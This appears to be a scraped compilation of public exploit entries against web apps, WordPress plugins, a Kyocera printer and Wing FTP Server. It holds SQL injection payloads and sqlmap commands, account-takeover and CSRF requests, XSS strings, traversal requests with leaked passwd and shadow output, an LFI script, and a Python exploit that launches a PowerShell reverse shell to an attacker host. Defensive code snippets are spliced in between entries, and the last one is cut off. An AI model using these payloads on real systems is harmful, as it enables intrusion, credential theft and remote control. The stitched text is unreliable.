# Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Description - The ‘id’ parameter in the Exam Reviewer Management System web application is vulnerable to SQL injection.

Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1

POC:-
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg
---

SQLMAP COMMAND
# sqlmap -u "http://127.0.0.1/erms/?p=take_exam&id=1" -p id --dbs --level 3
# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux

Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can take over any registered 'Staff' user account just by sending the POST request below, changing the "id", "firstname", "lastname", "username", "password" and "type" parameters.

# Steps to Reproduce
1. Send the POST request below, changing the "id", "firstname", "lastname", "username", "password" and "type" parameters.
2. Go to http://localhost/hocms/admin/ and log in to the user account with the changed username and password.

==============================================
POST /hocms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391
Content-Length: 899
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju

-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="id"


-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="firstname"

hi
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="lastname"

test
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="username"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="password"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="type"

1
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------8012296389370411172619882391--
# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
# Date 08.02.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://ays-pro.com/
# Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip
# Version: < 2.8.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24931
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md

'''
Description:
The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection.
'''

banner = '''
[+] Copy Content Protection and Content Locking - SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Copy Content Protection and Content Locking SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" '
print('    Sqlmap options:')
print('    -a, --all           Retrieve everything')
print('    -b, --banner        Retrieve DBMS banner')
print('    --current-user      Retrieve DBMS current user')
print('    --current-db        Retrieve DBMS current database')
print('    --passwords         Enumerate DBMS users password hashes')
print('    --tables            Enumerate DBMS database tables')
print('    --columns           Enumerate DBMS database table column')
print('    --schema            Enumerate DBMS schema')
print('    --dump              Dump DBMS database table entries')
print('    --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking

WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)

# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 9.1
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>
# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-10
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
# Tested Version: ECOSYS M2035dn
# Tested on: Linux
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)

# Proof of Concept:
# 1.- Create a directory traversal payload
# 2.- Add a null byte to the end of the payload (%00)
# 3.- Send your request

Request 1:

GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 1:

HTTP/1.1 200 OK
Content-Length: 844
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 15:55:57 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
adm:x:4:4:adm:/var/adm:/bin/sh
lp:x:5:7:lp:/var/spool/lpd:/bin/sh
sync:x:6:8:sync:/bin:/bin/sync
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
halt:x:8:10:halt:/sbin:/sbin/halt
mail:x:9:11:mail:/var/mail:/bin/sh
news:x:10:12:news:/var/spool/news:/bin/sh
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
operator:x:12:0:operator:/root:/bin/sh
games:x:13:60:games:/usr/games:/bin/sh
ftp:x:15:14:ftp:/var/ftp:/bin/sh
man:x:16:20:man:/var/cache/man:/bin/sh
www:x:17:18:www-data:/var/www:/bin/sh
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
proxy:x:19:21:proxy:/bin:/bin/sh
telnetd:x:20:22:proxy:/bin:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
ais:x:101:101:ais:/var/run/ais:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

Request 2:

GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 2:

HTTP/1.1 200 OK
Content-Length: 480
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 16:10:16 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
bin:*:15873::::::
daemon:*:15873::::::
sys:*:15873::::::
adm:*:15873::::::
lp:*:15873::::::
sync:*:15873::::::
shutdown:*:15873::::::
halt:*:15873::::::
mail:*:15873::::::
news:*:15873::::::
uucp:*:15873::::::
operator:*:15873::::::
games:*:15873::::::
ftp:*:15873::::::
man:*:15873::::::
www:*:15873::::::
sshd:*:15873::::::
proxy:*:15873::::::
telnetd:*:15873::::::
backup:*:15873::::::
ais:*:15873::::::
nobody:*:15873::::::

Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)

# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
# Date: 2022-02-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://subrion.org
# Software Link: https://subrion.org/download
# Version: 4.2.1
# Tested on: Windows 10

# [ About - Subrion CMS ]:
# Subrion is a PHP/MySQL based CMS & framework,
# that allows you to build websites for any purpose,
# Yes, from blog to corporate mega portal.

# [ Description ]:
# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
# With this vulnerability, authorized users can be added to the system.

# [ Sample CSRF Request ]:

POST /subrion/panel/members/add/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
Content-Length: 2522
Origin: http://localhost
Connection: close
Referer: http://localhost/subrion/panel/members/add/
Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="__st"

YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="username"

Aryan
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="fullname"

AryanChehreghani
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email"

aryanchehreghani@yahoo.com
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password2"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="usergroup_id"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="website"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="phone"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="biography"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="facebook"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="twitter"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="gplus"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="linkedin"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email_language"

en
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="sponsored"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured_end"

2022-03-09 12:03
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="status"

active
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="save"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="goto"

list
-----------------------------386122140640094420852486902--
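Defensive counterpart to the request above, as an added example (not Subrion's code): a server-side gate for a state-changing admin action that binds a random token to the session, compares the submitted field in constant time, and additionally checks that the Origin (or Referer) names the site's own host. The field name `__st` is reused from the request above purely as the form field to check; whether Subrion treats it as a token is not stated on this page. The session store is a constructed dict standing in for a framework session.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed in-memory session store; a real application would use its framework's session.
SESSIONS = {}


def issue_csrf_token(session_id):
    """Mint a random token once per session and bind it to that session."""
    token = secrets.token_urlsafe(32)
    SESSIONS.setdefault(session_id, {})["csrf"] = token
    return token


def origin_allowed(headers, allowed_host):
    """Origin (falling back to Referer) must name our own host; absence is treated as foreign."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlparse(source).hostname == allowed_host


def verify_state_change(session_id, form, headers, allowed_host="localhost", field="__st"):
    """Gate for state-changing admin actions such as adding a member.

    Returns (ok, reason). The token comparison is constant-time so a forged
    value cannot be matched byte by byte via timing differences.
    """
    session = SESSIONS.get(session_id)
    if session is None or "csrf" not in session:
        return False, "no session token"
    supplied = str(form.get(field, ""))
    if not hmac.compare_digest(session["csrf"].encode(), supplied.encode()):
        return False, "token mismatch"
    if not origin_allowed(headers, allowed_host):
        return False, "foreign origin"
    return True, "ok"
```

The point the check makes: a token field merely being present in the POST protects nothing; the server has to compare it against the value it issued to that session and refuse the request on mismatch, and the Origin check catches the cross-site case even if token handling regresses.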
# Exploit Title: Wing FTP Server - Authenticated RCE
# Date: 02/06/2022
# Exploit Author: notcos
# Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.
# Vendor Homepage: https://www.wftpserver.com/
# Software Link: https://www.wftpserver.com/download/WingFtpServer.exe
# Version: <=4.3.8
# Tested on: Windows

#!/usr/bin/python3
import requests
import sys
import base64
import urllib.parse

# Get command line arguments
if len(sys.argv) != 7:
    print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.")
    print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0])
    print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0])
    exit(1)
else:
    target = sys.argv[1]
    targetport = sys.argv[2]
    localip = sys.argv[3]
    localport = sys.argv[4]
    user = sys.argv[5]
    password = sys.argv[6]

# Create the login request
url = 'http://' + target + ':' + targetport + '/admin_loginok.html'
data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su'
        'bmit_btn=%2bLogin%2b')
headers = {
    "User-Agent": "Googlebot"
}

# Send the POST request to log in and save the cookie
r = requests.post(url, headers=headers, data=data)
cookie = 'UIDADMIN=' + r.cookies['UIDADMIN']
print('Login successful - Cookie: ' + cookie)

url = "http://" + target + ":" + targetport + "/admin_lua_script.html"
headers = {
    "User-Agent": "Googlebot",
    "Cookie": cookie,
}

# Base64 encode a nishang reverse tcp shell one liner and then url encode it
nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client"
        ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d"
        "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1"
        " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI"
        "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()")
encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8")
urlpayload = urllib.parse.quote(encodedStr, safe='+')
finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')"

# Send the reverse shell payload
try:
    r = requests.post(url, headers=headers, data=finalload, timeout=0.1)
except requests.exceptions.ReadTimeout:
    print("The payload has been sent. Check your listener.")
    pass
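The script above hides its payload behind `powershell -EncodedCommand`, and the detail that trips up triage is that the blob is base64 of UTF-16LE, not UTF-8. The following is an added example (not part of the exploit, and not any vendor's tooling) of how a responder would decode such a command line from process-creation telemetry and flag the indicators the technique above relies on. The indicator list, the flag-prefix handling and the two sample command lines are assumptions constructed for the example; the suspect sample is a non-functional fragment containing only the markers.

```python
import base64
import re

# Strings a defender would want flagged in a decoded command. Not exhaustive; an assumption
# derived from the reverse-shell one-liner in the script above.
INDICATORS = ("System.Net.Sockets.TCPClient", "GetStream(", "iex ", "Invoke-Expression", "FromBase64String")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, -ec, ...).
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_FLAG = re.compile(r"(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded_argument(command_line):
    """Return the base64 blob following the -EncodedCommand flag, or None."""
    m = ENC_FLAG.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(blob):
    """-EncodedCommand carries the script as UTF-16LE; decoding as UTF-8 yields NUL-riddled junk."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(command_line):
    """Decode an encoded command line and list matched indicators.

    Returns None when no encoded argument is present, otherwise a dict with
    the decoded script (or None), the indicators found, and a note.
    """
    blob = extract_encoded_argument(command_line)
    if blob is None:
        return None
    script = decode_encoded_command(blob)
    if script is None:
        return {"script": None, "indicators": [], "note": "undecodable blob"}
    hits = [i for i in INDICATORS if i.lower() in script.lower()]
    return {"script": script, "indicators": hits, "note": "ok"}


def encode_for_powershell(script):
    """Mirror of the encoding step, used here only to build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real captures).
BENIGN = "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell("Get-Date")
SUSPECT = "powershell -enc " + encode_for_powershell(
    "$c = New-Object System.Net.Sockets.TCPClient('203.0.113.5',4444);iex $data")

if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(triage(sample))
```

In practice the decoded script, not the raw command line, is what should be fed to detection rules; a rule matching on `TCPClient` in the command line itself never fires against an encoded invocation.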
# Exploit Title: WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)
# Date: 2022-01-26
# Exploit Author: Shweta Mahajan
# Vendor Homepage: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/
# Software Link: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/
# Tested on Windows
# CVE: CVE-2021-24901
# Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24901
# https://wpscan.com/vulnerability/9c315404-b66a-448c-a3b7-367a37b53435

How to reproduce vulnerability:

1. Install Latest WordPress
2. Install and activate Titan-labs-security-audit Version 1.0.0
3. Navigate to Security Audit settings >> enter the payload into 'Data Id'.
4. Enter the JavaScript payload mentioned below
   "><img src=x onerror=confirm(1)>
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.

Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion

# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Date: 2022-02-06
# Exploit Author: Ven3xy
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip
# Version: 2.9.3
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2020-35749

import requests
import sys
import time


class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'


color_random = [color.HEADER, color.IMPORTANT, color.NOTICE, color.OKBLUE, color.OKGREEN,
                color.WARNING, color.RED, color.END, color.UNDERLINE, color.LOGGING]


def banner():
    run = color_random[6] + '''\nWordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion\n'''
    run2 = color_random[2] + '''\t\t\t(CVE-2020-35749)\n'''
    run3 = color_random[4] + '''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
    print(run + run2 + run3)


if len(sys.argv) != 5:
    banner()
    print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")
    print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")
    exit()
else:
    banner()
    fetch_path = sys.argv[2]
    print(color_random[5] + "[+] Trying to fetch the contents from " + fetch_path)
    time.sleep(3)
    target_url = sys.argv[1]
    usernamex = sys.argv[3]
    passwordx = sys.argv[4]
    print("\n")

login = target_url + "wp-login.php"
wp_path = target_url + 'wp-admin/post.php?post=application_id&action=edit&sjb_file=' + fetch_path
username = usernamex
password = passwordx

with requests.Session() as s:
    headers = {
        'Cookie': 'wordpress_test_cookie=WP Cookie check',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15'
    }
    post_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': wp_path,
        'testcookie': '1'
    }
    s.post(login, headers=headers, data=post_data)
    resp = s.get(wp_path)
    out_file = open("output.txt", "w")
    print(resp.text, file=out_file)
    out_file.close()
    print(color_random[4] + resp.text)
    out = color_random[5] + "\n[+] Output Saved as: output.txt\n"
    print(out)
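Both the Kyocera entry (`/js/../../../etc/passwd%00.jpg`) and the Simple Job Board entry (`sjb_file=/etc/passwd`) above are the same defect: a client-supplied path is joined to a base directory without being confined to it, and in the Kyocera case a NUL byte truncates whatever suffix check existed. The following is an added example (not code from either vendor or plugin) of the confinement check a file-serving handler should apply: decode, refuse NUL bytes outright, canonicalise with `realpath`, and accept the result only if it still lies under the base directory. The base directories used are constructed paths for illustration.

```python
import os
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a requested path must not be served."""


def resolve_under_base(base_dir, requested):
    """Map a client-supplied path onto base_dir, or raise UnsafePath.

    Steps: percent-decode once, reject embedded NUL (the %00 truncation trick),
    strip leading separators so the request cannot be treated as absolute, then
    canonicalise with realpath so '..' segments and symlinks are resolved before
    the containment check.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise UnsafePath("NUL byte in path")
    relative = decoded.lstrip("/\\")
    if relative == "":
        raise UnsafePath("empty path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    # commonpath is the containment test; a plain startswith() would accept /srv/www/js2 for base /srv/www/js.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("path escapes base directory")
    return candidate


def resolve_basename_only(base_dir, requested):
    """Stricter variant for parameters like sjb_file that should only ever name one file in a directory."""
    decoded = unquote(requested)
    if "\x00" in decoded or "/" in decoded or "\\" in decoded or decoded in ("", ".", ".."):
        raise UnsafePath("only a bare file name is accepted")
    return os.path.join(os.path.realpath(base_dir), decoded)


def classify(base_dir, requested):
    """Convenience wrapper for logging and tests: 'ok' or the rejection reason."""
    try:
        resolve_under_base(base_dir, requested)
        return "ok"
    except UnsafePath as exc:
        return str(exc)
```

The NUL check comes first on purpose: once a NUL reaches a C-level filename API the string ends there, so any suffix test performed afterwards in the caller's language is testing characters the filesystem never sees.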
# Exploit Title: WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)
# Date: 2022-02-02
# Exploit Author: Shweta Mahajan
# Vendor Homepage: https://wordpress.org/plugins/cp-blocks/
# Software Link: https://wordpress.org/plugins/cp-blocks/
# Tested on Windows
# CVE: CVE-2022-0448
# Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0448
# https://wpscan.com/vulnerability/d4ff63ee-28e6-486e-9aa7-c878b97f707c

How to reproduce vulnerability:

1. Install Latest WordPress
2. Install and activate CP Blocks Version 1.0.14
3. Navigate to CP Blocks - License >> enter the payload into 'License ID'.
4. Enter the JavaScript payload mentioned below
   "><script>alert(0)</script>
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.

AtomCMS v2.0 - SQLi

# Exploit Title: AtomCMS v2.0 - SQLi
# Date: 08/02/2022
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Version: v2.0
# Category: Webapps
# Tested on: Debian linux
# CVE : CVE-2022-24223

====================================================

# PoC : SQLi : http://127.0.0.1/Atom.CMS/admin/login.php

POST /Atom.CMS/admin/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/Atom.CMS/admin/login.php
Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=test%40test.com&password=1234

Vulnerable Payload :

Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=test@test.com' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: email=test@test.com' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234
    Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -
---

====================================================

Hospital Management Startup 1.0 - 'Multiple' SQLi

# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
# Exploit Author: nu11secur1ty
# Date: 02.10.2022
# Vendor: https://github.com/kabirkhyrul
# Software: https://github.com/kabirkhyrul/HMS
# CVE-2022-23366

# Description:
The loginid and password parameters from Hospital Management Startup 1.0 appear to be vulnerable to SQL injection attacks. The attacker can retrieve all information from the administrator account of the system and he can use the information for malicious purposes!
WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!
Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: loginid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND (SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND 'sDHP'='sDHP&rememberme=on&submit=Login
---
```

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366
# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10

# Vulnerable Code line 68 in file "/hocms/admin/members/view_member.php"

$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");

# Sqlmap command:

sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member
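The vulnerable line quoted above interpolates `$id` straight into the SQL text; the same root cause underlies the `sccp_id[]` injection in the Secure Copy Content Protection entry earlier on this page. The following is an added example (not the application's PHP, and not a vendor fix) that reproduces the flawed pattern against a constructed in-memory SQLite stand-in for `collection_list`, places the bound-parameter form beside it, and adds the boundary validation that array-style parameters such as `sccp_id[]` need. Table layout and rows are constructed for the example.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory stand-in for the hocms collection_list table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE collection_list (id INTEGER, member_id INTEGER, amount REAL, date_collected TEXT)"
    )
    conn.executemany("INSERT INTO collection_list VALUES (?,?,?,?)", [
        (1, 1, 50.0, "2022-01-05"),
        (2, 1, 75.0, "2022-02-01"),
        (3, 2, 20.0, "2022-01-20"),
    ])
    return conn


def vulnerable_lookup(conn, member_id):
    """Mirrors the flawed pattern: the untrusted value becomes part of the SQL text."""
    sql = (f"SELECT * FROM collection_list WHERE member_id = '{member_id}' "
           "ORDER BY date(date_collected) DESC")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, member_id):
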